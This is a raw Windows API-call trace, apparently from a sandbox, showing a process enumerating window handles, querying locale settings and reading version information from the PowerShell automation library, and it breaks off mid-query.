	[0152.123] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x324
	[0152.123] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x4a0
	[0152.123] GetWindowThreadProcessId (in: hWnd=0x10074, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x4a0
	[0152.123] GetWindowThreadProcessId (in: hWnd=0x10060, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x4a0
	[0152.123] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x4a0
	[0152.123] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x4a0
	[0152.123] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x4a0
	[0152.123] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x4a0
	[0152.123] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x4a0
	[0152.124] GetWindowThreadProcessId (in: hWnd=0x10050, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x4a0
	[0152.124] GetWindowThreadProcessId (in: hWnd=0x100f6, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x45c
	[0152.124] GetWindowThreadProcessId (in: hWnd=0x5009a, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x4a0
	[0152.124] GetWindowThreadProcessId (in: hWnd=0x1008c, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x4a0
	[0152.124] GetWindowThreadProcessId (in: hWnd=0x90262, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0xd8c
	[0152.124] GetWindowThreadProcessId (in: hWnd=0x101be, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x914
	[0152.124] GetWindowThreadProcessId (in: hWnd=0x30290, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0xc70
	[0152.124] GetWindowThreadProcessId (in: hWnd=0x10282, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x7dc
	[0152.124] GetWindowThreadProcessId (in: hWnd=0xb0184, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0xc08
	[0152.124] GetWindowThreadProcessId (in: hWnd=0x40240, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x728
	[0152.124] GetWindowThreadProcessId (in: hWnd=0xa022e, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x9ec
	[0152.124] GetWindowThreadProcessId (in: hWnd=0x1401b2, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x610
	[0152.125] GetWindowThreadProcessId (in: hWnd=0x60192, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0xb5c
	[0152.125] GetWindowThreadProcessId (in: hWnd=0x60230, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0xbdc
	[0152.125] GetWindowThreadProcessId (in: hWnd=0x30234, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x8f0
	[0152.125] GetWindowThreadProcessId (in: hWnd=0x800aa, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0xb8c
	[0152.125] GetWindowThreadProcessId (in: hWnd=0x50228, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x5e0
	[0152.125] GetWindowThreadProcessId (in: hWnd=0x5021c, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x90
	[0152.125] GetWindowThreadProcessId (in: hWnd=0xa00a4, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x4a0
	[0152.125] GetWindowThreadProcessId (in: hWnd=0x400d6, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x4a0
	[0152.125] GetWindowThreadProcessId (in: hWnd=0x400fa, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x4a0
	[0152.125] GetWindowThreadProcessId (in: hWnd=0x500d2, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x4a0
	[0152.125] GetWindowThreadProcessId (in: hWnd=0x400bc, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x4a0
	[0152.125] GetWindowThreadProcessId (in: hWnd=0x400c8, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x4a0
	[0152.125] GetWindowThreadProcessId (in: hWnd=0x500d8, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x4a0
	[0152.126] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x4a0
	[0152.126] GetWindowThreadProcessId (in: hWnd=0x4021a, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x840
	[0152.126] GetWindowThreadProcessId (in: hWnd=0x3021e, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x844
	[0152.126] GetWindowThreadProcessId (in: hWnd=0x401f6, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x46c
	[0152.126] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0xb40
	[0152.126] GetWindowThreadProcessId (in: hWnd=0x40116, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x914
	[0152.126] GetWindowThreadProcessId (in: hWnd=0x700d4, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x988
	[0152.126] GetWindowThreadProcessId (in: hWnd=0x101ee, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x914
	[0152.126] GetWindowThreadProcessId (in: hWnd=0x201b8, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x950
	[0152.126] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x914
	[0152.126] GetWindowThreadProcessId (in: hWnd=0x201a8, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x914
	[0152.126] GetWindowThreadProcessId (in: hWnd=0x201aa, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x868
	[0152.126] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x850
	[0152.127] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x830
	[0152.127] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x814
	[0152.127] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x744
	[0152.127] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x2a8
	[0152.127] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x534
	[0152.127] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x5e4
	[0152.127] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x5c4
	[0152.127] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x58c
	[0152.127] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x238
	[0152.127] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x584
	[0152.127] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x7e8
	[0152.127] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x678
	[0152.128] GetWindowThreadProcessId (in: hWnd=0x10166, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x35c
	[0152.128] GetWindowThreadProcessId (in: hWnd=0x10162, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x51c
	[0152.128] GetWindowThreadProcessId (in: hWnd=0x1015e, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x360
	[0152.128] GetWindowThreadProcessId (in: hWnd=0x1015a, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x274
	[0152.128] GetWindowThreadProcessId (in: hWnd=0x20154, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x588
	[0152.128] GetWindowThreadProcessId (in: hWnd=0x20152, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0xc8
	[0152.128] GetWindowThreadProcessId (in: hWnd=0xa010a, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x21c
	[0152.128] GetWindowThreadProcessId (in: hWnd=0x3014e, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x5ec
	[0152.128] GetWindowThreadProcessId (in: hWnd=0x10144, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x334
	[0152.128] GetWindowThreadProcessId (in: hWnd=0x10142, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x664
	[0152.128] GetWindowThreadProcessId (in: hWnd=0x20138, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x334
	[0152.128] GetWindowThreadProcessId (in: hWnd=0x1012c, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x664
	[0152.129] GetWindowThreadProcessId (in: hWnd=0x10124, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x334
	[0152.129] GetWindowThreadProcessId (in: hWnd=0x1011a, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x5ec
	[0152.129] GetWindowThreadProcessId (in: hWnd=0x10118, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x5ec
	[0152.129] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x550
	[0152.129] GetWindowThreadProcessId (in: hWnd=0x2001c, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x7a0
	[0152.129] GetWindowThreadProcessId (in: hWnd=0x6009c, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x594
	[0152.129] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x564
	[0152.129] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x45c
	[0152.129] GetWindowThreadProcessId (in: hWnd=0x100fe, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x548
	[0152.129] GetWindowThreadProcessId (in: hWnd=0x5008e, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x4a0
	[0152.129] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x518
	[0152.129] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x4a0
	[0152.129] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x4a0
	[0152.130] GetWindowThreadProcessId (in: hWnd=0x10068, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x4a0
	[0152.130] GetWindowThreadProcessId (in: hWnd=0x10110, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x508
	[0152.130] GetWindowThreadProcessId (in: hWnd=0x10064, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x4a0
	[0152.130] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x4ec
	[0152.130] GetWindowThreadProcessId (in: hWnd=0x1004c, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x4a0
	[0152.130] GetWindowThreadProcessId (in: hWnd=0x10044, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x45c
	[0152.130] GetWindowThreadProcessId (in: hWnd=0x20040, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x45c
	[0152.130] GetWindowThreadProcessId (in: hWnd=0x3003e, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x44c
	[0152.130] GetWindowThreadProcessId (in: hWnd=0x20022, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x7ec
	[0152.130] GetWindowThreadProcessId (in: hWnd=0x100ee, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x45c
	[0152.130] GetWindowThreadProcessId (in: hWnd=0x10134, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x324
	[0152.130] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x4a0
	[0152.130] GetWindowThreadProcessId (in: hWnd=0x1004e, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x4a0
	[0152.131] GetWindowThreadProcessId (in: hWnd=0x60264, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0xda0
	[0152.131] GetWindowThreadProcessId (in: hWnd=0x101e0, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x914
	[0152.131] GetWindowThreadProcessId (in: hWnd=0x2019e, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x914
	[0152.131] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0xcd0
	[0152.131] GetWindowThreadProcessId (in: hWnd=0x10284, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0xc50
	[0152.131] GetWindowThreadProcessId (in: hWnd=0x6024a, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0xc4c
	[0152.131] GetWindowThreadProcessId (in: hWnd=0x60242, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0xc48
	[0152.131] GetWindowThreadProcessId (in: hWnd=0x4023c, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x9b4
	[0152.131] GetWindowThreadProcessId (in: hWnd=0x500be, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x8fc
	[0152.131] GetWindowThreadProcessId (in: hWnd=0x6022a, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0xbc0
	[0152.131] GetWindowThreadProcessId (in: hWnd=0x30236, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0xb0
	[0152.131] GetWindowThreadProcessId (in: hWnd=0xb0190, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x804
	[0152.132] GetWindowThreadProcessId (in: hWnd=0x800ce, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0xbc8
	[0152.132] GetWindowThreadProcessId (in: hWnd=0x701f2, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x854
	[0152.132] GetWindowThreadProcessId (in: hWnd=0x501f4, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x140
	[0152.132] GetWindowThreadProcessId (in: hWnd=0x30218, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x55c
	[0152.132] GetWindowThreadProcessId (in: hWnd=0x30222, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x34c
	[0152.132] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0xb40
	[0152.132] GetWindowThreadProcessId (in: hWnd=0x201f8, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x988
	[0152.132] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x868
	[0152.132] GetWindowThreadProcessId (in: hWnd=0x201ac, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x850
	[0152.147] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x830
	[0152.147] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x814
	[0152.147] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x744
	[0152.147] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x2a8
	[0152.147] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x534
	[0152.147] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x5e4
	[0152.147] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x5c4
	[0152.148] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x58c
	[0152.148] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x238
	[0152.148] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x584
	[0152.148] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x7e8
	[0152.148] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x678
	[0152.148] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x35c
	[0152.148] GetWindowThreadProcessId (in: hWnd=0x10164, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x51c
	[0152.148] GetWindowThreadProcessId (in: hWnd=0x10160, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x360
	[0152.148] GetWindowThreadProcessId (in: hWnd=0x1015c, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x274
	[0152.148] GetWindowThreadProcessId (in: hWnd=0x10158, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x588
	[0152.148] GetWindowThreadProcessId (in: hWnd=0x80150, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0xc8
	[0152.148] GetWindowThreadProcessId (in: hWnd=0x400a0, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x21c
	[0152.149] GetWindowThreadProcessId (in: hWnd=0x1012e, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x664
	[0152.149] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x334
	[0152.149] GetWindowThreadProcessId (in: hWnd=0x1011c, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x5ec
	[0152.149] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x550
	[0152.149] GetWindowThreadProcessId (in: hWnd=0x20016, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x7a0
	[0152.149] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x594
	[0152.149] GetWindowThreadProcessId (in: hWnd=0x10106, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x45c
	[0152.149] GetWindowThreadProcessId (in: hWnd=0x10112, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x508
	[0152.149] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x4ec
	[0152.149] GetWindowThreadProcessId (in: hWnd=0x10042, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x45c
	[0152.149] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x7ec
	[0152.152] WerSetFlags () returned 0x0
	[0152.159] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0152.159] CoTaskMemFree (pv=0x0) 
	[0152.160] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12dff8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12dff0 | out: pulNumLanguages=0x12dff8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12dff0) returned 1
	[0152.160] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12dff8, pwszLanguagesBuffer=0x2ec6848, pcchLanguagesBuffer=0x12dff0 | out: pulNumLanguages=0x12dff8, pwszLanguagesBuffer=0x2ec6848, pcchLanguagesBuffer=0x12dff0) returned 1
	[0152.165] CoTaskMemAlloc (cb=0x24) returned 0x3d0df0
	[0152.165] GetUserDefaultLocaleName (in: lpLocaleName=0x3d0df0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0152.165] CoTaskMemFree (pv=0x3d0df0) 
	[0152.237] CoTaskMemAlloc (cb=0x104) returned 0x3839f0
	[0152.237] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3839f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0152.237] CoTaskMemFree (pv=0x3839f0) 
	[0152.239] CoTaskMemAlloc (cb=0x104) returned 0x3839f0
	[0152.239] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3839f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0152.239] CoTaskMemFree (pv=0x3839f0) 
	[0152.241] CoTaskMemAlloc (cb=0x104) returned 0x3839f0
	[0152.241] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3839f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0152.241] CoTaskMemFree (pv=0x3839f0) 
	[0152.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0152.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0152.249] SetErrorMode (uMode=0x1) returned 0x1
	[0152.249] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x12dc70 | out: lpFileInformation=0x12dc70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0152.250] SetErrorMode (uMode=0x1) returned 0x1
	[0152.250] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x12dee0 | out: lpdwHandle=0x12dee0) returned 0x94c
	[0152.250] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2eca0d8 | out: lpData=0x2eca0d8) returned 1
	[0152.251] VerQueryValueW (in: pBlock=0x2eca0d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12de58, puLen=0x12de50 | out: lplpBuffer=0x12de58*=0x2eca174, puLen=0x12de50) returned 1
	[0152.251] VerQueryValueW (in: pBlock=0x2eca0d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x12ddc8, puLen=0x12ddc0 | out: lplpBuffer=0x12ddc8*=0x2eca250, puLen=0x12ddc0) returned 1
	[0152.251] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0152.251] CoTaskMemAlloc (cb=0x2e) returned 0x3d32a0
	[0152.251] lstrcpyW (in: lpString1=0x3d32a0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0152.251] CoTaskMemFree (pv=0x3d32a0) 
	[0152.251] VerQueryValueW (in: pBlock=0x2eca0d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x12ddc8, puLen=0x12ddc0 | out: lplpBuffer=0x12ddc8*=0x2eca2a4, puLen=0x12ddc0) returned 1
	[0152.251] lstrlenW (lpString="System.Management.Automation") returned 28
	[0152.251] CoTaskMemAlloc (cb=0x3c) returned 0x3dbe70
	[0152.251] lstrcpyW (in: lpString1=0x3dbe70, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0152.251] CoTaskMemFree (pv=0x3dbe70) 
	[0152.251] VerQueryValueW (in: pBlock=0x2eca0d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x12ddc8, puLen=0x12ddc0 | out: lplpBuffer=0x12ddc8*=0x2eca300, puLen=0x12ddc0) returned 1
	[0152.251] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0152.251] CoTaskMemAlloc (cb=0x20) returned 0x3d8780
	[0152.251] lstrcpyW (in: lpString1=0x3d8780, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0152.251] CoTaskMemFree (pv=0x3d8780) 
	[0152.251] VerQueryValueW (in: pBlock=0x2eca0d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x12ddc8, puLen=0x12ddc0 | out: lplpBuffer=0x12ddc8*=0x2eca340, puLen=0x12ddc0) returned 1
	[0152.252] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0152.252] CoTaskMemAlloc (cb=0x44) returned 0x3dbe70
	[0152.252] lstrcpyW (in: lpString1=0x3dbe70, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0152.252] CoTaskMemFree (pv=0x3dbe70) 
	[0152.252] VerQueryValueW (in: pBlock=0x2eca0d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x12ddc8, puLen=0x12ddc0 | out: lplpBuffer=0x12ddc8*=0x2eca3a8, puLen=0x12ddc0) returned 1
	[0152.252] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0152.252] CoTaskMemAlloc (cb=0x76) returned 0x367ed0
